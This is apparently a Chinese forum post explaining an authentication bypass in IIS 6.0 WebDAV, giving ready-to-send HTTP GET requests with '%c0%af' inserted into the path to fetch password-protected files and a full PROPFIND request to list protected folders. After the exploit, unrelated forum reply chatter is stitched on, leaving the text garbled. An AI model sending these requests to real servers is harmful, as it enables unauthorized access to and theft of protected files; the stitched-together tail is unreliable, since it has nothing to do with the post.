绕过IIS 6.0 WebDAV的远程身份验证
漏洞发现者:Nikolaos Rangos具体漏洞存在于带WebDAV功能的IIS 6.0中
Web服务器没有正确地处理Unicode命令的URI时,解析和发送回的数据.
假设有一个密码保护文件夹d:\inetpub\wwwroot\protected\
此文件夹内有一个名为 protected.zip "
向服务器发送一个HTTP GET请求
GET /%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servernameMu
指示Web服务器处理请求使用 WebDAV的
利用这种恶意的URI构建网络服务器发送文件到
/protected/ protected.zip ”而不要求进行适当的验证
另一个有效的请求可能会传送到Web服务器是:GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername
IIS 6.0中将会删除„%c0%af” 的请求,并发送回密码保护文件而不验证.
ASP脚本不能下载,除非以这种方式提供服务的脚本源代码是启用的
可以绕过访问限制的,密码保护文件夹和列表,下载,上传和修改文件
Copy code PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>IIS的回应的目录列表的文件夹中没有要求输入密码
怎么就没人拜我为偶像那?? 女人啊真是那句话~~~无理占三分~~忘记怎么说了 呵呵 ~~你帮我想想 这篇帖子构思新颖,题材独具匠心,段落清晰,情节诡异,跌宕起伏,主线分明,引人入胜,平淡中显示出不凡的文学功底,可谓是字字珠玑,句句经典,是我辈应当学习之典范(不好意思回错帖了 顶顶多好,大家都来! 我也不知道了~~你把我问蒙了 呵呵 什么什么啊?? 嘿...反了反了,,,, 哎 我我我怎么办啊?? 哥们,给我做个链接吧 嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中```````` 呵呵 放心 如我算错 你以后来砸我的帖子 呵呵 呵呵 我可不敢~~~~ 我不是来为楼主呐喊加油的,也不是对楼主进行围堵攻击的。
页:
[1]